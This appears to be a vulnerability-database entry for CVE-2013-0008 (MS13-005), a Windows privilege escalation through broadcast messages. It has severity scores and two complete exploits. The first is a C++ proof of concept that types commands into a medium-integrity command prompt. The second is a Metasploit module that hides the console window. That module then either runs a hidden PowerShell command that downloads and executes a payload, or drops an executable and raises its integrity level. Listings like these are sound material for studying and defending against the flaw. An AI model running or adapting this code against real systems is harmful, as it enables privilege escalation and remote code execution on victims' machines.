Related Weaknesses

| CWE-ID | Weakness Name | Source |
|---|---|---|
| CWE-264 | Category: Permissions, Privileges, and Access Controls. Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. | |
Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.2 | | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs. The percentile therefore lets you compare the EPSS score of one CVE with that of all other CVEs.
Exploit information
Exploit Database EDB-ID : 24485
Publication date : 2013-02-10 23h00 +00:00
Author : 0vercl0k
EDB Verified : No
```cpp
/*
    ms13-005-funz-poc.cpp - Drive a Medium IL cmd.exe via a Low IL
    process and message broadcasted
    Copyright (C) 2013 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    @taviso did all the job, I just followed its blogpost:
        -> http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html
    -- amazing.

    Cool trick:
        -> If you want to set this process to a low IL you can use:
            icacls ms13-005-funz-poc.exe /setintegritylevel L
        -> The new ms13-005-funz-poc.exe will be now launched as low IL
           (you can check it with process explorer)

    # Exploit Title: ms13-005-funz-poc.cpp
    # Date: 2013-02-05
    # Exploit Author: 0vercl0k - https://twitter.com/0vercl0k
    # Vendor Homepage: https://www.microsoft.com/
    # Version: Windows Vista, Windows Server 2008, Windows 7, Windows
      Server 2008 r2, Windows 8, Windows Server 2012, Windows RT (See
      http://technet.microsoft.com/fr-fr/security/bulletin/ms13-005)
    # Tested on: Windows 7
    # CVE : CVE-2013-0008 -
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0008
    # Video: http://0vercl0k.tuxfamily.org/bl0g/ms13-005-funz/ms13-005-funz-poc.mp4
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // EXIT_SUCCESS
#include <string.h>   // strlen

int main()
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    // CreateProcess may modify lpCommandLine, so it must be a writable buffer.
    char cmdline[] = "cmd.exe";

    // Each entry is typed into the medium IL prompt as one command line
    // (the ASCII-art spacing below is as extracted and not byte-exact).
    LPCSTR payload[] = {
        "echo \".___ _____ ______________ ______________ \"> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| | / \\ \\__ ___/ | \\_ _____/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"|___\\____|__ / |____| \\___|_ /_______ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" _______ .___ ________ ________ _____ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\ \\ | |/ _____/ / _____/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"\\____|__ /___|\\______ /\\______ /\\____|__ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "exit",
        NULL
    };

    printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n");
    getchar();

    si.cb = sizeof(si);
    CreateProcess(
        NULL,
        cmdline,
        NULL,
        NULL,
        TRUE,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &si,
        &pi
    );

    Sleep(1000);

    // Yeah, you can "bruteforce" the index of the window..
    printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..\n");
    keybd_event(VK_LWIN, 0x5B, 0, 0);
    keybd_event(VK_LSHIFT, 0xAA, 0, 0);
    keybd_event(0x37, 0x87, 0, 0);
    keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
    keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
    keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);

    Sleep(1000);

    printf("3] Killing now the useless low IL cmd.exe..\n");
    TerminateProcess(
        pi.hProcess,
        1337
    );
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n");
    printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n");

    for(unsigned int i = 0; payload[i] != NULL; ++i)
    {
        for(unsigned int j = 0; j < strlen(payload[i]); ++j)
        {
            // Yeah, that's the fun part to watch ;D
            Sleep(10);
            SendMessage(
                HWND_BROADCAST,
                WM_CHAR,
                (WPARAM)payload[i][j],
                0
            );
        }

        SendMessage(
            HWND_BROADCAST,
            WM_CHAR,
            VK_RETURN,
            0
        );
    }

    return EXIT_SUCCESS;
}
```
Exploit Database EDB-ID : 27296
Publication date : 2013-08-01 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::FileDropper
  include Msf::Post::File

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
      'Description'    => %q{
        The Windows kernel does not properly isolate broadcast messages from low integrity
        applications from medium or high integrity applications. This allows commands to be
        broadcasted to an open medium or high integrity command prompts allowing escalation
        of privileges. We can spawn a medium integrity command prompt, after spawning a low
        integrity command prompt, by using the Win+Shift+# combination to specify the
        position of the command prompt on the taskbar. We can then broadcast our command
        and hope that the user is away and doesn't corrupt it by interacting with the UI.
        Broadcast issue affects versions Windows Vista, 7, 8, Server 2008, Server 2008 R2,
        Server 2012, RT. But Spawning a command prompt with the shortcut key does not work
        in Vista so you will have to check if the user is already running a command prompt
        and set SPAWN_PROMPT false. The WEB technique will execute a powershell encoded
        payload from a Web location. The FILE technique will drop an executable to the
        file system, set it to medium integrity and execute it. The TYPE technique will
        attempt to execute a powershell encoded payload directly from the command line but
        it may take some time to complete.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy',                                 # Discovery
          'Axel Souchet',                                  # @0vercl0k POC
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'  # Metasploit module
        ],
      'Platform'       => [ 'win' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => "Nov 27 2012",
      'References'     =>
        [
          [ 'CVE', '2013-0008' ],
          [ 'MSB', 'MS13-005' ],
          [ 'OSVDB', '88966' ],
          [ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
        ]
    ))

    register_options(
      [
        OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
        OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
        OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
      ], self.class
    )
  end

  # Heuristic: a low integrity process cannot create a directory under %USERPROFILE%.
  def low_integrity_level?
    tmp_dir = expand_path("%USERPROFILE%")
    cd(tmp_dir)
    new_dir = "#{rand_text_alpha(5)}"

    begin
      session.shell_command_token("mkdir #{new_dir}")
    rescue
      return true
    end

    if directory?(new_dir)
      session.shell_command_token("rmdir #{new_dir}")
      return false
    else
      return true
    end
  end

  # Press Win+Shift+<number>, which asks explorer.exe to launch the
  # taskbar item at that position as a new (medium integrity) process.
  def win_shift(number)
    vk = 0x30 + number
    bscan = 0x81 + number
    client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
    client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
    client.railgun.user32.keybd_event(vk, bscan, 0, 0)
    client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
    client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
    client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
  end

  def count_cmd_procs
    count = 0
    client.sys.process.each_process do |proc|
      if proc['name'] == 'cmd.exe'
        count += 1
      end
    end
    vprint_status("Cmd prompt count: #{count}")
    return count
  end

  def cleanup
    if datastore['SPAWN_PROMPT'] and @hwin
      vprint_status("Rehiding window...")
      client.railgun.user32.ShowWindow(@hwin, 0)
    end
    super
  end

  def exploit
    # First of all check if the session is running on Low Integrity Level.
    # If it isn't, it isn't worth continuing.
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
    fail_with(Exploit::Failure::NotVulnerable, "Not running at Low Integrity!") unless low_integrity_level?

    # If the user prefers to drop payload to FILESYSTEM, try to cd to %TEMP% which
    # hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
    # integrity process can write.
    drop_to_fs = false
    if datastore['TECHNIQUE'] == 'FILE'
      payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
      begin
        tmp_dir = expand_path("%TEMP%")
        tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
        cd(tmp_dir)
        print_status("Trying to drop payload to #{tmp_dir}...")
        if write_file(payload_file, generate_payload_exe)
          print_good("Payload dropped successfully, exploiting...")
          drop_to_fs = true
          register_file_for_cleanup(payload_file)
          payload_path = tmp_dir
        else
          print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
          drop_to_fs = false
        end
      rescue ::Rex::Post::Meterpreter::RequestError
        print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
        drop_to_fs = false
      end
    end

    if drop_to_fs
      command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
      make_it(command)
    elsif datastore['TECHNIQUE'] == 'TYPE'
      if datastore['CUSTOM_COMMAND']
        command = datastore['CUSTOM_COMMAND']
      else
        print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the psh payload")
        command = cmd_psh_payload(payload.encoded)
      end
      make_it(command)
    else
      super
    end
  end

  def primer
    url = get_uri()
    download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
    command = "powershell.exe -w hidden -nop -ep bypass -c #{download_and_run}"
    make_it(command)
  end

  def make_it(command)
    if datastore['SPAWN_PROMPT']
      @hwin = client.railgun.kernel32.GetConsoleWindow()['return']
      if @hwin == nil
        @hwin = client.railgun.user32.GetForegroundWindow()['return']
      end
      client.railgun.user32.ShowWindow(@hwin, 0)
      client.railgun.user32.ShowWindow(@hwin, 5)

      # Spawn low integrity cmd.exe
      print_status("Spawning Low Integrity Cmd Prompt")
      windir = client.fs.file.expand_path("%windir%")
      li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid

      count = count_cmd_procs
      spawned = false
      print_status("Bruteforcing Taskbar Position")
      9.downto(1) do |number|
        vprint_status("Attempting Win+Shift+#{number}")
        win_shift(number)
        sleep(1)
        if count_cmd_procs > count
          print_good("Spawned Medium Integrity Cmd Prompt")
          spawned = true
          break
        end
      end

      client.sys.process.kill(li_cmd_pid)
      fail_with(Exploit::Failure::Unknown, "No Cmd Prompt spawned") unless spawned
    end

    print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
    command.each_char do |c|
      print c if command.length < 200
      client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
    end
    print_line

    print_status("Executing command...")
    client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
  end

  def on_request_uri(cli, request)
    print_status("Delivering Payload")
    data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end
end
```
Products Mentioned

Configuration 0
Microsoft>>Windows_vista >> Version *

Configuration 0
Microsoft>>Windows_server_2008 >> Version *
Microsoft>>Windows_server_2008 >> Version -

Configuration 0
Microsoft>>Windows_7 >> Version *
Microsoft>>Windows_7 >> Version -

Configuration 0
Microsoft>>Windows_server_2008 >> Version r2

Configuration 0
Microsoft>>Windows_8 >> Version -

Configuration 0
Microsoft>>Windows_server_2012 >> Version -

Configuration 0
Microsoft>>Windows_rt >> Version -
References